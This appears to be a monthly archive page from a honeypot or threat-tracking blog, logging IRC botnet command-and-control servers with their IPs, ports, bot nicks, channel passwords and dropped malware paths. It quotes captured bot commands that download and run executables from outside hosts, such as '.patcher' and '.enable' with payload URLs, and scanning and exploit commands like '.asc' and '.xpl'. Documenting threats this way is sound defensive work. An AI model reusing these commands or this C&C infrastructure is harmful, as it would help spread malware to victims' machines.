Month: August 2010

Botnet C&C irc 60.10.179.100:8680 User Name: SP3-696 Real Name: HOME-OFF-D5F0AC Nick Name: USA|XP|SP3|461761 Channel Name: #naga1 Name: #naga2 Name: #naga3 Name: #naga4 Topic Deleted: :|.ddosstop -s|.stop -s|.patcher http://218.25.54.221:5751/abc.exe 240 -s|.sftp 218.25.54.221 2689 123 123 gff6.exe -s|.asc svrsvc_SP2 100 5 9999 1 -b -e -r -s|.asc svrsvc_XXX 100 5 9999 1 -b -e -r -s FtpRead more...

Botnet C&C irc qip.no-ip.info DNS_TYPE_A 91.121.249.36 qip.no-ip.info:1337 Nick: n{AUT|XP}mzmxemd Username: cmjv Joined Channel: #dynamo Channel Topic for Channel #dynamo: “l” Process Created C:Documents and SettingsAdministratorApplication Datataskmnger.exe

rudebwoi.gotdns.com:1337 Nick: n{Ganja-AUT|XP}992192 Username: 6850 Joined Channel: #Pokey# Process Created Process: C:Documents and SettingsAdministratorApplication Datahidserv.exe

Ninjutsu.Ninjahz.com DNS_TYPE_A 94.228.214.124 Ninjutsu.Ninjahz.com :1010 Nick: n{AUT|XP}ltsnars Username: n{AUT|XP}ltsnars Server Pass: gBot Joined Channel: #Rennegan with Password sakura Process Created Process: C:WINDOWSsystem32devon.exe

Botnet C&C irc hacked.myvnc.com Type dnsA 66.90.65.10 hacked.myvnc.com:6667 User Name: ubadnj Real Name: ubadnj Nick Name: raGe|BIdFcrWrBE Channel: #h22turbo# Password: b00st3d Topic Deleted: :.vncstop .xpl 50 1 173.x.x.x 2 0 Notice Message Deleted Value: :honeypot.security.org NOTICE AUTH :*** Looking up your hostname… Value: :honeypot.security.org NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP addressRead more...

hub23biz.net(snk from russia 60k botnet) Botnet C&C irc hub23biz.net DNS_TYPE_A 194.116.175.63 hub23biz.net :81 Nick: n[AUS|XP|pc1]elppmus Username: n Joined Channel: #usb Channel Topic for Channel #usb: “,” Process Created Process: C:Documents and SettingsAdministratorApplication DataU-2535-6853-8747winusbmgr.exe Botnet C&C irc hub23biz.net DNS_TYPE_A 194.116.175.63 hub23biz.net :81 Nick: n[AUT|XP|pc3]hoiplvf Username: n Joined Channel: #biz# Channel Topic for Channel #biz#: “,” ProcessRead more...

Botnet C&C irc login.ipwhois.co.uk DNS_TYPE_A 92.241.165.230 92.241.164.101 92.241.164.102 login.ipwhois.co.uk :47221 Nick: :{00-AUS-XP-pc7-6970} Username: blaze Server Pass: weed Joined Channel: #crimbot-esp Channel Topic for Channel #crimbot-esp: “.enable http://rapidshare.com/files/415120355/file.exe 1” Private Message to User {iNF-00-AUT-XP-pXxa1@: “20.5kb downloaded to C:DOCUME~1ADMINI~1LOCALS~1Temptempfile66347.exe (20.5kbps)” Process Created C:WINDOWSwinusbservice.exe Botnet C&C irc login.ipwhois.co.uk DNS_TYPE_A 92.241.164.101 92.241.164.102 92.241.165.230 login.ipwhois.co.uk:47221 Nick: AUS|XP|pc2|269032 Username: bubqfli JoinedRead more...

ganja009.no-ip.info DNS_TYPE_A 212.117.183.200 212.117.183.200:6374 Nick: n{Ganja-AUS|XP}921011 Username: 3663 Joined Channel: #nade Process Created Process: C:Documents and SettingsAdministratorApplication Datataskmge.exe

Value and Dee Botnet C&C irc dns 14ips DNS_TYPE_A addr: blazing10.no-value.info ip: 93.62.62.208 blazing10.no-value.info ip: 213.11.137.67 blazing10.no-value.info ip: 208.53.148.235 blazing10.no-value.info ip: 203.141.249.71 blazing10.no-value.info ip: 195.230.16.104 blazing10.no-value.info ip: 195.22.37.163 blazing10.no-value.info ip: 193.179.184.64 blazing10.no-value.info ip: 188.65.49.11 blazing10.no-value.info ip: 153.90.164.208 blazing10.no-value.info ip: 147.102.159.9 blazing10.no-value.info ip: 146.83.165.10 addr: blazing10.no-value.info ip: 139.91.102.101 addr: blazing10.no-value.info ip: 137.229.242.129 blazing10.no-value.info:9595 Serverpass:Peja0444@ NICK [USA|00|XP|P|22202]Read more...

Remote Host Port Number 178.86.2.16 1234 PASS xxx 204.0.5.42 80 204.0.5.43 80 204.0.5.58 80 207.38.101.11 80 207.38.101.12 80 216.178.38.168 80 63.135.80.58 80 63.135.86.21 80 63.135.86.39 80 64.208.138.214 80 NICK NEW-[USA|00|P|38552] USER XP-4514 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|38552] -ix JOIN #!nn! test PONG 22 MOTD JOIN #USA * The data identified by the following URLs wasRead more...